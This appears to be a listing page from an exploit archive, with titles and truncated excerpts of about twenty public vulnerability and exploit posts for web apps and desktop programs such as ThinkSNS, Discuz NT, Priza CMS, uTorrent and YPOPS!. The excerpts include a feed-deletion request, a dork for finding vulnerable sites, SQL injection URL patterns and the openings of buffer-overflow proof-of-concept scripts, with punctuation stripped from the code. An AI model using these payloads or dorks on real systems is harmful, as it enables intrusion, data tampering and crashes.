ThinkSNS V3缺陷-02

简要描述： ThinkSNS V3正式放出，特表示祝贺。 不带刷的，友情检测（因为我们公司要用！真的要用！！） 详细说明： 关键词：任意用户微博（动态）删除！ 删除个人微博（动态）请求如下 POST /t3/index.php?app=public&mod=Feed&act=removeFeed HTTP/1.1 Host: demo.thinksns.com User-Agent: Mozilla/5.0 Windows NT 6.1; rv:19.0 Gecko/20100101 Firefox/19.0 Accept: application/json,...

Discuz NT multiple versions of a file upload vulnerability-vulnerability warning-the black bar safety net

Affected versions: seems to have affected. Vulnerability file:tools/ajax. aspx Vulnerability analysis:the page where the ajax request, there is no permission validation, visitors to the permissions you can call all the methods, it is dangerous to write, so with the following vulnerabilities. ! Wh...

Priza Israel CMS 0.0.2 Cross Site Scripting / SQL Injection

Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability Date: 2012-01-05 GMT +7 Author: BHG Security Center Software Link: http://www.priza.co.il/ Vendor Responses: They didn't respond to the emails. Dork: intext:"Powered by Priza" Version : 0.0.2 Tested on: ubuntu 11.04 CVE : ...

Shanghai Freemen SQL Injection

+Title : SHANGHAI FREEMEN Sql Injection +Vender : http://www.shanghai-freemen.com/ +Auther : Bl4ck.Viper Turkish Hacker +Email : [email protected] +Date : 01/07/2011 +Home : www.skote-vahshat.com Err0r 0n : hot.asp Exploit : http://target.com/products/hot.asp?id=SQL Demo :...

PHP Art Info SQL Injection

=============================================== PHP Art Info SQL Injection Vulnerability =============================================== +Title : PHP Art Info SQL Injection Vulnerability +Software : Art Info +Vendor : NN +Download : NN +Author : josalijoe +Contact : josalijoeathotmaildotcom +Web ...

waibrasil Remote / Local File Inclusion

Exploit for php platform in category web applications ======================================= waibrasil Remote / Local File Inclusion ======================================= Author: eXeSoul Vendor: www.waibrasil.com.br category: Remote Version: Web Application Tested on: Apcahe/Unix Code : exploi...

MovieLibrary 1.4.401 - '.dmv' Local Denial of Service

Exploit Title: MovieLibrary Local Dos .dmv file Date: April 14, 2010 Software Link: http://wensoftware.com/ Version: v1.4.401 Tested on: Windows XP SP3 Author: anonymous Site: www.setfreesecurity.com At the top: Click - New - Open Open the newly created dmv file Click File - Import Database Progr...

post Card ( catid ) Remote SQL Injection Vulnerability

Exploit for php platform in category web applications ====================================================== post Card catid Remote SQL Injection Vulnerability ====================================================== post Card catid Remote SQL Injection Vulnerability Author: Hussin X Home :...

Crimson Editor 3.70 SEH Overwrite

!/usr/bin/python Exploit Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit Date : 21/03/2010 Author : mrme Bug found by : sharpe Version : 3.70 Release Tested on : XP SP3 En Reference : http://www.exploit-db.com/exploits/11803 Greetz to : Corelan Security Team & sharpe...

Arab Cart 1.0.2.0 Insecure Cooking Handling

======================================================================================== | Title : Arab Cart Version 1.0.2.0 Insecure Cookie Handling Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | | Web Sit...

phpunity.newsmanager LFI Vulnerability

Exploit for unknown platform in category web applications ====================================== phpunity.newsmanager LFI Vulnerability ====================================== Software Information + Vendor : http://www.perlunity.de/ + Download :...

YPOPS! v0.9.7.3 Buffer Overflow (SEH)

No description provided by source. Version:0.9.7.3 Tested on: Windows XP SP3 !/usr/bin/python All modules are SafeSEH protected in service pack 3. import socket, sys print "\n ========================================" print " YPOPS! v 0.9.7.3 Buffer Overflow SEH" print " Proof of Concept by Blake...

phpPowerCards 2.0 Cross Site Scripting

======================================================================================== | Title : phpPowerCards 2.0 Cross Site Scripting Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | | EDB-ID : ...

Squito Gallery 1.0 Cross Site Scripting

======================================================================================== | Title : Squito Gallery v.1.0 Cross Site Scripting Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | | EDB-ID...

PHPShop 0.6 - Bypass

PHPShop 0.6 - Bypass ======================================================================================== | Title : PHPShop Version 0.6 by pass Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | |...

PHP Uploader Downloader 2.0 - Arbitrary File Upload

PHP Uploader Downloader 2.0 - Arbitrary File Upload ======================================================================================== | Title : PHP Uploader Downloader Upload Shell Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum ...

Xion Audio Player 1.0 121 m3u file buffer overflow

Exploit for unknown platform in category local exploits ================================================== Xion Audio Player 1.0 121 m3u file buffer overflow ================================================== Title: Xion Audio Player 1.0 121 m3u file buffer overflow CVE-ID: OSVDB-ID: Author: Drag...

uTorrent 1.8.3 Buffer Overflow

!/usr/bin/env python uTorrent Create New Torrent - Paste string into "Source" field - Click "Add File" buff = "\x41" 9000 try: f1 = open"uTorrent.txt","w"; f1.writebuff; f1.close; print "\nuTorrent = 1.8.3 Build 15772 Create New Torrent Buffer Overflow PoC" print "By: DrIDE" print "\nFile Created...

Allomani Movies & Clips 2.7.0 - Blind SQL Injection

?php iniset"maxexecutiontime",0; printr' || || | || o,7 || . o7 || q||| o///, : / / . /QQQQQQQQQQQQQQQQQQQ\ q Allomani movies & Clips v2.7.0 /QQQ/\QQQ\ Blind SQL inj. exploit /QQQQQ/ \QQQQQQ\ q GET 3 /QQQQ/ QQQQ\ /QQQQ/ \QQQQ\ q http://allomani.com |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| Fr...

Teraway LinkTracker 1.0 Insecure Cookie

-------------------------------------+ Homepage:http://www.teraway.com Product: Teraway LinkTracker V1.0 home:www.h4ckf0ru.com Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae Note: سال الممكن المستحيل اين تقيم قال في احلام العاجز ------------------------------------- Teraway LinkTracker V1.0 Insecur...